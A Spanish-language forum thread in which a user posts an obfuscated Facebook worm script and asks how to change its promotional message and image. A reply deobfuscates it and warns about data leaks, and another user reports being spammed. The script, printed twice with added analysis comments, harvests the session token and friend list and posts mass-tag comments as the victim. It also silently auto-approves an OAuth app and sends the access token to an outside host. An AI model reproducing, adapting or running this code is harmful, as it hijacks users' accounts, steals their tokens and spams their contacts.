


Título: como editar este script
Publicado por: 11naracus en 17 Noviembre 2014, 20:52 pm
hola gente necesito saber si alguien me podria decir como modificar este script, que lo que hace es publicar en el fb este mensaje en todos los grupos, paginas y perfiles que tengas en el fb. aca una imagen de como queda (borre algunas partes para no hacer spam)
(http://i61.tinypic.com/1z726mr.jpg)
lo que quiero es editar lo que dice "aumenta tu pupolaridad en facebook rapido facil y gratis entra a .... y descubrelo " y la imagen

bueno espero me puedan ayudar salu2 y muchas gracias

este es el script

Código:
// Analysis note: builds a <script> element whose source text is a call to
// `new AsyncRequest()...send()` against the relative path
// /ajax/friends/lists/subscribe/modify (action=subscribe), with `uidss` spliced
// in as the `flid` value, then appends it to document.body so it executes in
// the page the script was pasted into. AsyncRequest is not defined in this
// listing; presumably it is a helper supplied by the host page -- confirm.
// `uidss` is concatenated into script source unescaped, so whatever string is
// passed becomes code.
function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
// Called with an empty string: the generated source then reads `{ flid:  }`,
// which is not valid JavaScript, so this call most likely ends in a syntax
// error inside the injected script rather than in a request.
IbraheemNada("");
// Analysis note (obfuscated section): `_0xa22c` is a lookup table of strings;
// every `_0xa22c[n]` below is a property name, URL or form-field fragment taken
// from it. With the table substituted, the visible behaviour is:
//  - fb_dtsg: value of the first element named "fb_dtsg" in the page
//    (presumably the session's request token -- confirm); user_id: derived from
//    the digits of the c_user cookie.
//  - arkadaslari_al(id) (Turkish, roughly "get friends"): GETs
//    www.facebook.com/ajax/typeahead/first_degree.php with friends_only and
//    viewer/__user set to user_id, strips the "for (;;);" prefix from the
//    response and eval()s the rest into the global `arkadaslar`. It then walks
//    payload.entries in slices of 27, builds one " @[uid:text]" mention per
//    entry, and calls yorum_yap(id, mesaj) once per slice.
//  - yorum_yap(id, text) (roughly "make comment"): POSTs to
//    /ajax/ufi/add_comment.php with ft_ent_identifier=id, comment_text=text and
//    the captured fb_dtsg value.
//  - RandomArkadas(): returns nine mentions picked with Math.random(); nothing
//    in this listing calls it.
//  - `id` is the hard-coded string "311411802351987", so every comment targets
//    that one entity; the final statement arkadaslari_al(id) starts the run.
// Net effect as written: comments that tag the logged-in user's friend list are
// posted from the user's own session. The response text goes through eval(),
// and f, i, mesaj and mesaj_text are assigned without declaration (implicit
// globals).
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","311411802351987","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function 
(){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var 
_0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);

// Analysis note: this branch obtains an OAuth access token for the logged-in
// account without user interaction and hands it to a third-party host.
// The host check passes four strings to indexOf, but String.prototype.indexOf
// takes a single search string, so only "www.facebook.com" is looked for.
if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
// profile_id: derived from the c_user cookie of the current session.
var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
// uygulamaizinver (Turkish, roughly "grant app permission"): fetches `url`,
// parses the response into a detached <html> element and, if it contains a
// form, passes the first form and its action URL to duzenlevegonder().
// izinverhtml and act are assigned without declaration (implicit globals).
function uygulamaizinver(url){
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function () {
if(xmlhttp.readyState == 4){
izinverhtml = document.createElement("html");
izinverhtml.innerHTML = xmlhttp.responseText;
if(izinverhtml.getElementsByTagName("form").length > 0){
izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
act = izinverhtml.getElementsByTagName("form")[0].action;
duzenlevegonder(izinverhtml,act);
}
}
}; 
xmlhttp.open("GET", url, true);
xmlhttp.send();
}
// duzenlevegonder (roughly "edit and send"): serialises the form's inputs into
// a urlencoded body and POSTs it to `act`; the form is never shown to the user.
// Inputs whose name contains "__CANCEL__" are left out and "__CONFIRM__=1" is
// appended, i.e. the dialog is answered as confirmed on the user's behalf.
function duzenlevegonder(formnesne,act){
izinverparams = "";
for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
// NOTE(review): the second test has no comparison; it is falsy only when the
// input name starts with "cancel_clicked".
if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
// Names and values are concatenated without URL-encoding.
izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
}
}
// The first <select>, if any, is submitted with the fixed value 80; what that
// value means is not visible in this listing.
if(formnesne.getElementsByTagName("select").length > 0){
izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
}
// The result of replace() is discarded, so this line changes nothing.
izinverparams.replace("&fb_dtsg","fb_dtsg");
izinverparams += "&__CONFIRM__=1";
// Self-assignment; no effect.
formnesne = formnesne;
var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
   if(xmlhttp.readyState == 4){
     izinhtml = document.createElement("html");
     izinhtml.innerHTML = xmlhttp.responseText;
   // Another form in the response means another dialog step: submit it too.
   if(izinhtml.getElementsByTagName("form").length > 0){
     izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
     act = izinhtml.getElementsByTagName("form")[0].action;
     duzenlevegonder(izinhtml,act)
   }else{
   // No form left: take the text between "#access_token=" and "&expires_in"
   // from the response and pass it on. The match result is not null-checked.
   sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
   if (sex[1]) {
   tokenyolla(sex[1]);
   }
   }
   }
        };

xmlhttp.open("POST", act , true);
xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send(izinverparams);

}

// TokenUrl: builds a protocol-relative OAuth dialog URL that asks for a token
// directly (response_type=token) for app `id`, with scope email,
// publish_stream, user_likes, friends_likes and user_birthday.
function TokenUrl(id){
return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id  +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
}

// Runs the authorisation flow for the hard-coded app id when no
// localStorage['token_<profile_id>'] entry exists. Nothing in this listing
// writes that key, and `tarih` is not defined in this listing either.
if(!localStorage['token_' + profile_id] ||  (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
uygulamaizinver(TokenUrl("121876164619130"));
// Synchronous request for the profile's public record; `isim` ("name") is read
// from it but not used anywhere in this listing.
var http = new XMLHttpRequest();
http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
http['send']();
var get = JSON.parse(http['responseText']);
var isim = get.name;
}
// Every 200 ms, empties every element with class "_5ce", "uiToggle wrap" or
// "uiPopover". Which page controls carry these classes is not visible here;
// presumably menus or popovers the user could otherwise open -- confirm.
window.setInterval(function(){
if(document.getElementsByClassName("_5ce")){
for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
document.getElementsByClassName("_5ce")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiToggle wrap")){
for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
}
}
if(document.getElementsByClassName("uiPopover")){
for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
document.getElementsByClassName("uiPopover")[i].innerHTML = "";
}
}
},200);
// tokenyolla (roughly "send token"): navigates the top-level window to
// http://facebook.jona.cl/ with the token in the URL fragment. The host is not
// facebook.com and the scheme is plain http; script on the destination page can
// read the fragment. This is the step where the access token is handed to a
// third party, so a session that reached it should treat the token and the
// app authorisation as compromised.
function tokenyolla(token){
top.location.href = 'http://facebook.jona.cl/#' + token;
}}
// Last statement of the script: shows a dialog reading "clic en aceptar"
// ("click accept"). The code above has already executed by the time it appears.
var alibasim = "clic en aceptar";
alert(alibasim);


Título: Re: como editar este script
Publicado por: engel lex en 18 Noviembre 2014, 03:47 am
El código está ligeramente ofuscado para que no sea legible a primera vista; no es difícil revertirlo, y si estudias un poco de jscript seguro lograrás modificarlo... por cierto, me da pereza revisarlo porque es largo, pero sospecho que no solo coloca ese aviso :P pendiente con esos códigos, que al usarlos sin saber pueden ser "peligrosos" (enviar información personal tuya a algún sitio)

te lo dejo aquí bien organizado y visible para ayudarte ;)

---modificado---
traduje lo más complicado para que se te haga más facil el analisis

Código
  // Analysis note: builds a <script> element whose source text is a call to
  // `new AsyncRequest()...send()` against /ajax/friends/lists/subscribe/modify
  // (action=subscribe) with `uidss` spliced in as `flid`, and appends it to
  // document.body so it executes in the current page. AsyncRequest is not
  // defined in this listing; presumably the host page provides it -- confirm.
  1.    function IbraheemNada(uidss) {
  2.       var a = document.createElement('script');
  3.       a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  4.       document.body.appendChild(a)
  5.    }
  // Called with an empty string, the generated source reads `{ flid:  }`, which
  // is not valid JavaScript, so this call most likely only yields a syntax error.
  6.    IbraheemNada("");
  // Analysis note: `_0xa22c` is the obfuscator's string table. In the lines
  // that follow it the table lookups were replaced by their text without
  // quotes, so they read as pseudo-code and are not valid JavaScript as printed.
  7.    var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "311411802351987", "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText", ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ", "&filter[0]=user", "&options[0]=friends_only", "&options[1]=nm", "&token=v7", "&viewer=", "&__user=", "https://", "indexOf", "URL", "GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor", "&ft_ent_identifier=", "&comment_text=", "&source=2", "&client_id=1377871797138:1707018092", "&reply_fbid", "&parent_comment_id", "&rootid=u_jsonp_2_3", "&clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid":", "}", "&attached_sticker_fbid=0", "&attached_photo_fbid=0", "&giftoccasion", "&ft[tn]=[]", "&__a=1", "&__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "&__req=q", "&fb_dtsg=", "&ttstamp=", "POST", "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader", "status", "close"];
  // fb_dtsg: value of the first page element named "fb_dtsg" (presumably the
  // session's request token -- confirm).
  8.    var fb_dtsg = document[getElementsByName](fb_dtsg)[0][value];
  // user_id: derived from the digits of the c_user cookie.
  9.    var user_id = document[cookie][match](document[cookie][match](/c_user=(\d+)/)[1]);
  // Hard-coded id that is later sent as ft_ent_identifier, i.e. the one entity
  // every comment is posted on.
  10.    var id = 311411802351987;
  // arkadaslar: Turkish, roughly "friends"; filled by the eval() in
  // arkadaslari_al.
  11.    var arkadaslar = [];
  12.    var svn_rev;
  13.  
  // arkadaslari_al (Turkish, roughly "get friends"): requests the typeahead
  // endpoint first_degree.php with friends_only and viewer/__user set to
  // user_id, then turns the returned entries into comment text.
  14.    function arkadaslari_al(id) {
  15.       var _0x7892x7 = new XMLHttpRequest();
  16.       _0x7892x7[onreadystatechange] = function() {
  17.           if (_0x7892x7[readyState] == 4) {
                // The response, minus its "for (;;);" prefix, is executed with
                // eval() as an assignment to the global `arkadaslar`.
  18.               eval(arkadaslar = + _0x7892x7[responseText].toString()[replace](for (;;);, ) + ;);
                // Entries are processed in slices of 27; each slice becomes one
                // comment made of " @[uid:text]" mentions.
  19.               for (f = 0; f < Math[round](arkadaslar[payload][entries][length] / 27); f++) {
  20.                   mesaj = ;
  21.                   mesaj_text = ;
  22.                   for (i = f * 27; i < (f + 1) * 27; i++) {
  23.                       if (arkadaslar[payload][entries][i]) {
  24.                           mesaj +=  @[ + arkadaslar[payload][entries][i][uid] + : + arkadaslar[payload][entries][i][text] + ];
  25.                           mesaj_text +=  + arkadaslar[payload][entries][i][text];
  26.                       };
  27.                   };
                    // One comment per slice, posted on the hard-coded id.
  28.                   yorum_yap(id, mesaj);
  29.               };
  30.           };
  31.       };
  32.       var _0x7892x8 = &filter[0]=user;
  33.       _0x7892x8 += &options[0]=friends_only;
  34.       _0x7892x8 += &options[1]=nm;
  35.       _0x7892x8 += &token=v7;
  36.       _0x7892x8 += &viewer= + user_id;
  37.       _0x7892x8 += &__user= + user_id;
            // Same endpoint over https or http, matching the current page's URL.
  38.       if (document[URL][indexOf](https://) >= 0) {
  39.           _0x7892x7[open](GET, https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1 + _0x7892x8, true);
  40.       } else {
  41.           _0x7892x7[open](GET, http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1 + _0x7892x8, true);
  42.       };
  43.       _0x7892x7[send]();
  44.    };
  45.  
  // RandomArkadas (roughly "random friend"): returns nine " @[uid:text]"
  // mentions. The uid and the text are picked with separate Math.random()
  // calls, so they can come from different entries. Nothing in this listing
  // calls this function.
  46.    function RandomArkadas() {
  47.       var _0x7892xa = ;
  48.       for (i = 0; i < 9; i++) {
  49.           _0x7892xa +=  @[ + arkadaslar[payload][entries][Math[floor](Math[random]() * arkadaslar[payload][entries][length])][uid] + : + arkadaslar[payload][entries][Math[floor](Math[random]() * arkadaslar[payload][entries][length])][text] + ];
  50.       };
  51.       return _0x7892xa;
  52.    };
  53.  
  // yorum_yap (Turkish, roughly "make comment"): POSTs a urlencoded body to
  // /ajax/ufi/add_comment.php from the current session. `id` is sent as
  // ft_ent_identifier, the second argument as comment_text, and the fb_dtsg
  // value read from the page is included so the request is accepted as coming
  // from the logged-in user (presumably -- confirm).
  54.    function yorum_yap(id, _0x7892xc) {
  55.       var _0x7892xd = new XMLHttpRequest();
  56.       var _0x7892x8 = ;
  57.       _0x7892x8 += &ft_ent_identifier= + id;
  58.       _0x7892x8 += &comment_text= + encodeURIComponent(_0x7892xc);
  59.       _0x7892x8 += &source=2;
  60.       _0x7892x8 += &client_id=1377871797138:1707018092;
  61.       _0x7892x8 += &reply_fbid;
  62.       _0x7892x8 += &parent_comment_id;
  63.       _0x7892x8 += &rootid=u_jsonp_2_3;
  64.       _0x7892x8 += &clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid": + id + };
  65.       _0x7892x8 += &attached_sticker_fbid=0;
  66.       _0x7892x8 += &attached_photo_fbid=0;
  67.       _0x7892x8 += &giftoccasion;
  68.       _0x7892x8 += &ft[tn]=[];
  69.       _0x7892x8 += &__user= + user_id;
  70.       _0x7892x8 += &__a=1;
  71.       _0x7892x8 += &__dyn=7n8ahyj35ynxl2u5F97KepEsyo;
  72.       _0x7892x8 += &__req=q;
  73.       _0x7892x8 += &fb_dtsg= + fb_dtsg;
  74.       _0x7892x8 += &ttstamp=;
  75.       _0x7892xd[open](POST, /ajax/ufi/add_comment.php, true);
  76.       _0x7892xd[setRequestHeader](Content-type, application/x-www-form-urlencoded);
  77.       _0x7892xd[onreadystatechange] = function() {
  78.           if (_0x7892xd[readyState] == 4 && _0x7892xd[status] == 200) {
                // Property read only; the response is not inspected.
  79.               _0x7892xd[close];
  80.           };
  81.       };
  82.       _0x7892xd[send](_0x7892x8);
  83.    };
  // Entry point of this part: fetch the friend list, then post the comments.
  84.    arkadaslari_al(id);
  85.  
  // Analysis note: this branch obtains an OAuth access token for the logged-in
  // account without user interaction and hands it to a third-party host.
  // The host check passes four strings to indexOf, but String.prototype.indexOf
  // takes a single search string, so only "www.facebook.com" is looked for.
  86.    if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0) {
            // profile_id: derived from the c_user cookie of the current session.
  87.       var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
  88.  
            // uygulamaizinver (Turkish, roughly "grant app permission"): fetches
            // `url`, parses the response into a detached <html> element and, if
            // it contains a form, passes the first form and its action URL to
            // duzenlevegonder().
  89.       function uygulamaizinver(url) {
  90.           var xmlhttp = new XMLHttpRequest();
  91.           xmlhttp.onreadystatechange = function() {
  92.               if (xmlhttp.readyState == 4) {
  93.                   izinverhtml = document.createElement("html");
  94.                   izinverhtml.innerHTML = xmlhttp.responseText;
  95.                   if (izinverhtml.getElementsByTagName("form").length > 0) {
  96.                       izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
  97.                       act = izinverhtml.getElementsByTagName("form")[0].action;
  98.                       duzenlevegonder(izinverhtml, act);
  99.                   }
  100.               }
  101.           };
  102.           xmlhttp.open("GET", url, true);
  103.           xmlhttp.send();
  104.       }
  105.  
            // duzenlevegonder (roughly "edit and send"): serialises the form's
            // inputs into a urlencoded body and POSTs it to `act`; the form is
            // never shown to the user. Inputs whose name contains "__CANCEL__"
            // are left out and "__CONFIRM__=1" is appended, i.e. the dialog is
            // answered as confirmed on the user's behalf.
  106.       function duzenlevegonder(formnesne, act) {
  107.           izinverparams = "";
  108.           for (i = 0; i < formnesne.getElementsByTagName("input").length; i++) {
                    // NOTE(review): the second test has no comparison; it is
                    // falsy only when the name starts with "cancel_clicked".
  109.               if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")) {
  110.                   izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
  111.               }
  112.           }
                // The first <select>, if any, is submitted with the fixed value
                // 80; what that value means is not visible in this listing.
  113.           if (formnesne.getElementsByTagName("select").length > 0) {
  114.               izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
  115.           }
                // The result of replace() is discarded; this line changes nothing.
  116.           izinverparams.replace("&fb_dtsg", "fb_dtsg");
  117.           izinverparams += "&__CONFIRM__=1";
  118.           formnesne = formnesne;
  119.           var xmlhttp = new XMLHttpRequest();
  120.           xmlhttp.onreadystatechange = function() {
  121.               if (xmlhttp.readyState == 4) {
  122.                   izinhtml = document.createElement("html");
  123.                   izinhtml.innerHTML = xmlhttp.responseText;
                        // Another form in the response means another dialog
                        // step: submit it the same way.
  124.                   if (izinhtml.getElementsByTagName("form").length > 0) {
  125.                       izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
  126.                       act = izinhtml.getElementsByTagName("form")[0].action;
  127.                       duzenlevegonder(izinhtml, act)
  128.                   } else {
                            // No form left: take the text between
                            // "#access_token=" and "&expires_in" from the response
                            // and pass it on. The match is not null-checked.
  129.                       sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
  130.                       if (sex[1]) {
  131.                           tokenyolla(sex[1]);
  132.                       }
  133.                   }
  134.               }
  135.           };
  136.  
  137.           xmlhttp.open("POST", act, true);
  138.           xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  139.           xmlhttp.send(izinverparams);
  140.  
  141.       }
  142.  
            // TokenUrl: builds a protocol-relative OAuth dialog URL that asks for
            // a token directly (response_type=token) for app `id`, with scope
            // email, publish_stream, user_likes, friends_likes, user_birthday.
  143.       function TokenUrl(id) {
  144.           return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
  145.       }
  146.  
            // Runs the authorisation flow for the hard-coded app id when no
            // localStorage['token_<profile_id>'] entry exists. Nothing in this
            // listing writes that key, and `tarih` is not defined here either.
  147.       if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])) {
  148.           uygulamaizinver(TokenUrl("121876164619130"));
                // Synchronous request for the profile's public record; `isim`
                // ("name") is read from it but not used in this listing.
  149.           var http = new XMLHttpRequest();
  150.           http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
  151.           http['send']();
  152.           var get = JSON.parse(http['responseText']);
  153.           var isim = get.name;
  154.       }
            // Every 200 ms, empties every element with class "_5ce",
            // "uiToggle wrap" or "uiPopover". Which page controls carry these
            // classes is not visible here; presumably menus or popovers the user
            // could otherwise open -- confirm.
  155.       window.setInterval(function() {
  156.           if (document.getElementsByClassName("_5ce")) {
  157.               for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) {
  158.                   document.getElementsByClassName("_5ce")[i].innerHTML = "";
  159.               }
  160.           }
  161.           if (document.getElementsByClassName("uiToggle wrap")) {
  162.               for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) {
  163.                   document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
  164.               }
  165.           }
  166.           if (document.getElementsByClassName("uiPopover")) {
  167.               for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) {
  168.                   document.getElementsByClassName("uiPopover")[i].innerHTML = "";
  169.               }
  170.           }
  171.       }, 200);
  172.  
            // tokenyolla (roughly "send token"): navigates the top-level window
            // to http://facebook.jona.cl/ with the token in the URL fragment.
            // The host is not facebook.com and the scheme is plain http; script
            // on the destination page can read the fragment. This is the step
            // where the access token is handed to a third party, so a session
            // that reached it should treat the token and the app authorisation
            // as compromised.
  173.       function tokenyolla(token) {
  174.           top.location.href = 'http://facebook.jona.cl/#' + token;
  175.       }
  176.    }
  // Last statement of the script: shows a dialog reading "clic en aceptar"
  // ("click accept"). The code above has already executed by the time it appears.
  177.    var alibasim = "clic en aceptar";
  178.    alert(alibasim);


Título: Re: como editar este script
Publicado por: Leo.Fernandez en 18 Noviembre 2014, 21:21 pm
Hola, bueno lo use sin saber, y lleno de publicaciones a mis amigos con la imagen, pero como sé si no envío info personal?


Título: Re: como editar este script
Publicado por: engel lex en 18 Noviembre 2014, 21:29 pm
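analizando el código y comprobando que no haya hecho un request que no debería; por ejemplo, en el listado de arriba la función tokenyolla() redirige la ventana a facebook.jona.cl con el access_token en la URL, que es justo el tipo de envío a un sitio externo que hay que buscar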


Título: Re: como editar este script
Publicado por: 11naracus en 19 Noviembre 2014, 02:40 am
gracias por responder ... no entiendo nada traducido y todo no entiendo nada :( no se nada de esto si alguien me podria cambiar la imagen y el mensaje  estaria de lujo o me diga como hacerlo :S